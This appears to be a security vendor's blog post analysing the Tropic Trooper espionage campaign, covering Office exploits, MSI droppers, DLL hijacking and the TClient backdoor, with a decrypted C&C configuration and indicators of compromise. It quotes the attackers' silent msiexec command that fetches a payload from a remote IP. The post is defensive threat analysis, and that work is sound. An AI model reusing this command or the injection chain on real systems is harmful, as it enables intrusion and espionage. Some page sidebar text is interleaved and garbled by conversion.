[Home » Exploits » Tropic Trooper’s New Strategy](https://blog.trendmicro.com/trendlabs-security-intelligence/) Tropic Trooper’s New Strategy **[Posted on: March 14, 2018 at 7:01 am](https://blog.trendmicro.com/trendlabs-security-intelligence/2018/03/)** **[Posted in: Exploits,](https://blog.trendmicro.com/trendlabs-security-intelligence/category/exploits/)** [Malware,](https://blog.trendmicro.com/trendlabs-security-intelligence/category/malware/) [Targeted Attacks](https://blog.trendmicro.com/trendlabs-security-intelligence/category/targeted_attacks/) **Author:** [Trend Micro](https://blog.trendmicro.com/trendlabs-security-intelligence/author/trend-micro/) **_by Jaromir Horejsi, Joey Chen, and Joseph C. Chen_** **0** [Tropic Trooper (also known as KeyBoy) levels its campaigns against Taiwanese, Philippine, and](https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-tropic-trooper-infiltrates-secret-keepers) Hong Kong targets, focusing on their government, healthcare, transportation, and high-tech industries. Its operators are believed to be very organized and develop their own cyberespionage tools that they fine-tuned in their recent campaigns. Many of the tools they use now feature new behaviors, including a change in the way they maintain a foothold in the targeted network. **_Attack Chain_** _Figure 1. Attack chain of Tropic Trooper’s operations_ Here’s a summary of the attack chain of Tropic Trooper’s recent campaigns: [1. Execute a command through exploits for CVE-2017-11882 or CVE-2018-0802, security flaws in](https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-11882-exploited-deliver-cracked-version-loki-infostealer/) Microsoft Office’s Equation Editor (EQNEDT32.EXE). 2. Download an installer package (.msi) and install it on the system by executing the command: /c _msiexec /q /i [hxxp://61[.]216[.]5[.]24/in.sys])._ 3. This system configuration file (in.sys) will drop a backdoor installer (UserInstall.exe) then delete itself. The backdoor installer will drop a normal sidebar.exe file (a Windows Gadget tool, a feature [already discontinued by Windows), a malicious loader (in](https://support.microsoft.com/en-ph/help/13787/gadgets-have-been-discontinued) _“C:\ProgramData\Apple\Update\wab32res.dll“), and an encrypted configuration file._ _[UserInstall.exe will abuse the BITSadmin command-line tool to create a job and launch](https://msdn.microsoft.com/en-us/library/windows/desktop/aa362813(v=vs.85).aspx)_ _sidebar.exe._ 4. The malicious loader will use dynamic-link library (DLL) hijacking — injecting malicious code into a process of a file/application — on sidebar.exe and launch dllhost.exe (a normal file). The loader will then inject a DLL backdoor into dllhost.exe. We also observed malicious documents that don’t need to download anything from the internet as the backdoor’s dropper is already embedded in the document. This, however, doesn’t influence the overall result for the victim. Th b kd ill l d h d fi i fil d d i h S S k Featured Stories systemd Vulnerability Leads [to Denial of Service on](http://blog.trendmicro.com/trendlabs-security-intelligence/systemd-vulnerability-leads-to-denial-of-service-on-linux/) Linux qkG Filecoder: Self[Replicating, Document-](http://blog.trendmicro.com/trendlabs-security-intelligence/qkg-filecoder-self-replicating-document-encrypting-ransomware/) Encrypting Ransomware Mitigating CVE-2017-5689, [an Intel Management Engine](http://blog.trendmicro.com/trendlabs-security-intelligence/mitigating-cve-2017-5689-intel-management-engine-vulnerability/) Vulnerability A Closer Look at North Korea’s Internet From Cybercrime to Cyberpropaganda Security Predictions for 2018 Attackers are banking on network vulnerabilities and inherent weaknesses to facilitate massive malware attacks, IoT hacks, and operational disruptions. The ever-shifting threats and increasingly expanding attack surface will challenge users and enterprises to catch up with their security. Read our security predictions for 2018. Business Process Compromise Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: [Business Process](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-business-process-compromise) Compromise. ----- j g y p y recipients. Below is a screenshot of the document used in their latest campaigns: _Figure 2. Malicious document used by Tropic Trooper_ **_PDB Strings as Context Clues_** The MSI file has two program database (PDB) strings inside: one belonging to the MSI file, and another for the backdoor installer (detected by Trend Micro as TROJ_TCDROP.ZTFB). _Figure 3. PDB strings inside the MSI file_ The first PDB string has a certain ss2/Projects/MsiWrapper (Project MsiWrapper) in it, which we found to be an open-source application that converts executable setup programs to MSI files. The second PDB string contains Work, House, and TSSL: we can assume this tool belongs to Tropic [Trooper’s TSSL project as seen by other researchers. Here it is a new one, as seen in their](https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html) misspelling of “Horse” to “House” (other reports had the string typed correctly). Another interesting PDB string we found is _D:\Work\Project\VS\house\Apple\Apple_20180115\Release\InstallClient.pdb. At installation, the_ MSI file drops three files and creates one hidden directory (UFile) into _C:\ProgramData\Apple\Update\, likely as a ruse._ It would then use sidebar.exe to load the malicious wab32res.dll (TROJ_TCLT.ZDFB) through DLL hijacking. This is carried out to evade antivirus (AV) detection, because wab32res.dll is loaded by a benign file. _Figure 4. The installer drops three files into the Apple/Update directory_ _Figure 5. PDB strings inside the loader file_ From the PDB string above, the attackers intended it to be a loader (hence the name FakeRun) and not the actual backdoor. FakeRun’s PDB string (D:\Work\Project\VS\house\Apple\Apple_20180115\Release\FakeRun.pdb) indicates the loader will execute dllhost.exe and inject one malicious DLL file, which is the backdoor, into this process. The backdoor, TClient (BKDR_TCLT.ZDFB), is so named from its own PDB string. g qkG Filecoder: Self[Replicating, Document-](https://blog.trendmicro.com/trendlabs-security-intelligence/qkg-filecoder-self-replicating-document-encrypting-ransomware/) Encrypting Ransomware Bad Rabbit Ransomware [Spreads via Network, Hits](https://blog.trendmicro.com/trendlabs-security-intelligence/bad-rabbit-ransomware-spreads-via-network-hits-ukraine-russia/) Ukraine and Russia A Look at Locky [Ransomware’s Recent Spam](https://blog.trendmicro.com/trendlabs-security-intelligence/look-locky-ransomwares-recent-spam-activities/) Activities Magnitude Exploit Kit Now [Targeting South Korea With](https://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-now-targeting-korea-with-magniber-ransomware/) Magniber Ransomware Recent Posts Tropic Trooper’s New Strategy March Patch Tuesday Fixes 75 Security Issues, [Drops Registry Key](https://blog.trendmicro.com/trendlabs-security-intelligence/march-patch-tuesday-fixes-75-security-issues-drops-registry-key-requirement-in-windows-10/) Requirement in Windows 10 Detecting Attacks that Exploit Meltdown and Spectre with Performance Counters Campaign Possibly Connected to [“MuddyWater” Surfaces](https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/) in the Middle East and Central Asia Cryptocurrency-Mining [Malware: 2018’s New](https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-malware-2018-new-menace/) Menace? Ransomware 101 This infographic shows how ransomware has evolved, how big the problem has become, and ways to avoid being a ransomware victim. [Check the infographic](http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-101-what-it-is-and-how-it-works) Popular Posts Homemade Browser [Targeting Banco do Brasil](https://blog.trendmicro.com/trendlabs-security-intelligence/homemade-browser-targeting-banco-do-brasil-users/) Users Vulnerabilities in Apache [CouchDB Open the Door to](https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/) ----- _Figure 6. TClient is injected into dllhost.exe_ **_Malware Analysis_** _wab32res.dll (FakeRun loader) loads TClient. Once the loader is executed, it will check the current_ process (sidebar.exe) whether to load it or not. Successfully checking the loader will execute the _dllhost.exe process and create a hardcode mutex to avoid injecting it into the wrong dllhost.exe, as_ there can be multiple instances of it depending on the number of programs using the Internet Information Services. _Figure 7. The loader checking the sidebar process_ _Figure 8. The malicious loader injecting the backdoor into dllhost.exe_ _[Figure 9. Comparison of TClient’s configuration format in 2016 (left, from other researchers) and](https://citizenlab.ca/2016/11/parliament-keyboy/)_ _2018 (right)_ TClient will use SSL to connect to Tropic Trooper’s C&C server. However, the C&C server and some configuration values are not hardcoded in the backdoor. This allows Tropic Trooper’s operators to easily change/update the C&C server and configure other values. TClient is actually one of Tropic Trooper’s other backdoors. The backdoor noted by other security researchers was encoded with different algorithms and configured with different parameter names in 2016, for instance. TClient uses symmetric encryption to decrypt its configuration with one 16byte key in 2018. The image and table below illustrate TClient’s encrypted configuration that we decrypted (via Python code): _Figure 10. Snapshot of code we used to decrypt TClient’s configuration_ p Monero Miner Payloads Cryptocurrency-Mining [Malware: 2018’s New](https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-malware-2018-new-menace/) Menace? New AndroRAT Exploits Dated Privilege Escalation Vulnerability, Allows Permanent Rooting Stay Updated Email Subscription Your email here Your email here Subscribe ----- _Figure 11. Encrypted backdoor configuration_ **Description** **Decryption Strings** Check code MDDEFGEGETGIZ Addr1: tel.qpoe[.]com Addr2: elderscrolls.wikaba[.]com Addr3: tel.qpoe[.]com Port1: 443 Port2: 443 Port3: 53 LoginPasswd: someone HostMark: mark Proxy: 0 _Figure 12. Decrypted backdoor configuration_ Reverse analysis of TClient allowed us to determine how to decrypt the C&C information. TClient will use custom SSL libraries to connect the C&C server. We also found another SSL certificate on this C&C server. A closer look reveals that it was registered quite recently, and is set to expire after a year, suggesting Tropic Trooper’s use or abuse of components or services that elapse so they can leave as few traces as possible. _Figure 13. SSL certificate’s validity_ **_Following Tropic Trooper’s Trails_** We further monitored their activities and found three additional and notable PDB strings in their malware: D:\Work\Project\VS\HSSL\HSSL_Unicode _2\Release\ServiceClient.pdb D:\Work\VS\Horse\TSSL\TSSL_v3.0\TClient\Release\TClient.pdb D:\Work\VS\Horse\TSSL\TSSL_v0.3.1_20170722\TClient\x64\Release\TClient.pdb These came from open-intelligence platforms and incident response cases. These strings shed further light on Tropic Trooper’s operations: They have another campaign/project named HSSL, which supports Unicode characters. The TSSL project has a v3.0 version, indicating the operators can mix and match different versions of their malware, depending on their target. The TSSL project has 64-bit version. **_The Need for a Proactive Incident Response Strategy_** Cyberespionage campaigns are persistent and, as shown by Tropic Trooper, always raring to exploit weaknesses in people and technology. For organizations, this highlights the significance of staying ahead of their attackers: detect, analyze, and respond. What techniques will they use? How can my organization’s attack surface be reduced? What did I do to respond to the threat — what worked, what didn’t, and what could be fine-tuned? [A proactive incident response strategy provides threat intelligence — from the endpoint to the](http://blog.trendmicro.com/trendlabs-security-intelligence/four-steps-to-an-effective-targeted-attack-response/) network — that can let IT/system administrators identify malicious activities that aren’t typically visible to traditional security solutions. TClient, for instance, uses DLL hijacking and injection that may not be as noticeable to others. Its use of the SSL protocol also means it can blend with legitimate traffic. Analyzing their PDB strings can also provide a deeper insight into the campaign’s bigger picture. Ascertaining the tactics and techniques they use empower organizations in developing robust and actionable indicators of compromise (IoCs) that can act as benchmarks for response ----- Keep the system, its applications, and the network updated. The vulnerabilities that Tropic [Trooper’s campaigns have been patched last January, for instance. Enforce a stronger patch](https://blog.trendmicro.com/trendlabs-security-intelligence/januarys-patch-tuesday-fixes-56-security-issues-including-meltdown-spectre/) [management policy, and consider virtual patching for legacy systems.](https://www.trendmicro.com/en_us/business/capabilities/intrusion-prevention.html?cm_re=10_19_17-_-2d_Capabilities-_-IntrusionPrevention) [Enforce the principle of least privilege: Employ network segmentation and data categorization to](https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/protecting-data-through-network-segmentation) [deter lateral movement and mitigate further exposure. Application control and behavior monitoring](https://www.trendmicro.com/en_ph/business/products/user-protection/sps/endpoint/endpoint-application-control.html) block suspicious files and anomalous routines from being installed or executed in the system. [Disable or secure the use of system administration tools such as PowerShell and other command-](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/best-practices-securing-sysadmin-tools) line tools that may be abused. [Actively monitor your perimeter, from gateways and endpoints to networks and servers. Firewalls](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) [as well as intrusion detection and prevention systems help thwart network-based attacks.](https://www.trendmicro.com/en_us/business/products/network/integrated-atp/next-gen-intrusion-prevention-system.html) Nurture a culture of cybersecurity. Spear-phishing emails, for instance, rely on baiting targets with socially engineered documents. The technologies that help protect the organization are only as good as the people who use them. **_Indicators of Compromise (IoCs):_** _Related Hashes (SHA-256):_ Detected as CVE-2018-0802.ZTFC: 1d128fd61c2c121d9f2e1628630833172427e5d486cdd4b6d567b7bdac13935e BKDR_TCLT.ZDFB: 01087051f41df7bb030256c97497f69bc5b5551829da81b8db3f46ba622d8a69 BKDR64_TCLT.ZTFB: 6e900e5b6dc4f21a004c5b5908c81f055db0d7026b3c5e105708586f85d3e334 TROJ_SCLT.ZTFB: 49df4fec76a0ffaee5e4d933a734126c1a7b32d1c9cb5ab22a868e8bfc653245 TROJ_TCDROP.ZTFB: b0f120b11f727f197353bc2c98d606ed08a06f14a1c012d3db6fe0a812df528a d65f809f7684b28a6fa2d9397582f350318027999be3acf1241ff44d4df36a3a 85d32cb3ae046a38254b953a00b37bb87047ec435edb0ce359a867447ee30f8b TROJ_TCLT.ZDFB: 02281e26e89b61d84e2df66a0eeb729c5babd94607b1422505cd388843dd5456 fb9c9cbf6925de8c7b6ce8e7a8d5290e628be0b82a58f3e968426c0f734f38f6 _URLs related to C&C communication:_ qpoe[.]com wikaba[.]com tibetnews[.]today dns-stuff[.]com 2waky[.]com # Related Posts: **[ChessMaster’s New Strategy: Evolving Tools and Tactics](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/)** **[Winnti Abuses GitHub for C&C Communications](https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/)** **[Cerber Starts Evading Machine Learning](https://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/)** **[SYSCON Backdoor Uses FTP as a C&C Channel](https://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/)** Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware: [ENTERPRISE](http://www.trendmicro.com/us/security-intelligence/enterprise-ransomware/index.html) » [SMALL BUSINESS](http://www.trendmicro.com/us/security-intelligence/small-business-ransomware/index.html) » [HOME](http://www.trendmicro.com/us/home/consumer-ransomware/index.html) » Tags: [CVE-2017-11882](https://blog.trendmicro.com/trendlabs-security-intelligence/tag/cve-2017-11882/) [CVE-2018-0802](https://blog.trendmicro.com/trendlabs-security-intelligence/tag/cve-2018-0802/) [KeyBoy](https://blog.trendmicro.com/trendlabs-security-intelligence/tag/keyboy/) [Operation Tropic Trooper](https://blog.trendmicro.com/trendlabs-security-intelligence/tag/operation-tropic-trooper/) [tropic trooper](https://blog.trendmicro.com/trendlabs-security-intelligence/tag/tropic-trooper/) -----  Recommend # ⤤ Share Sort by Best ## Start the discussion… **LOG IN WITH** **OR SIGN UP WITH DISQUS** Name Be the first to comment. ✉ **Subscribe** d **[Add Disqus to your siteAdd DisqusAdd](https://publishers.disqus.com/engage?utm_source=trendlabs&utm_medium=Disqus-Footer)** � **[Privacy](https://help.disqus.com/customer/portal/articles/466259-privacy-policy)** [Home and Home Office](http://www.trendmicro.com/us/home/index.html) | [For Business](http://www.trendmicro.com/us/business/index.html) | [Security Intelligence](http://www.trendmicro.com/us/security-intelligence/index.html) | [About Trend Micro](http://www.trendmicro.com/us/about-us/index.html) [Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣](http://www.trendmicro.com.au/au/home/index.html) [Latin America Region (LAR): Brasil, México](http://br.trendmicro.com/br/home/index.html) [North America Region (NABU): United States, Canada](http://www.trendmicro.com/us/index.html) [Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland](http://www.trendmicro.fr/) [Privacy Statement](http://www.trendmicro.com/us/about-us/legal-policies/privacy-statement/index.html) [Legal Policies Copyright © 2018 Trend Micro Incorporated. All rights reserved.](http://www.trendmicro.com/us/about-us/legal-policies/index.html) -----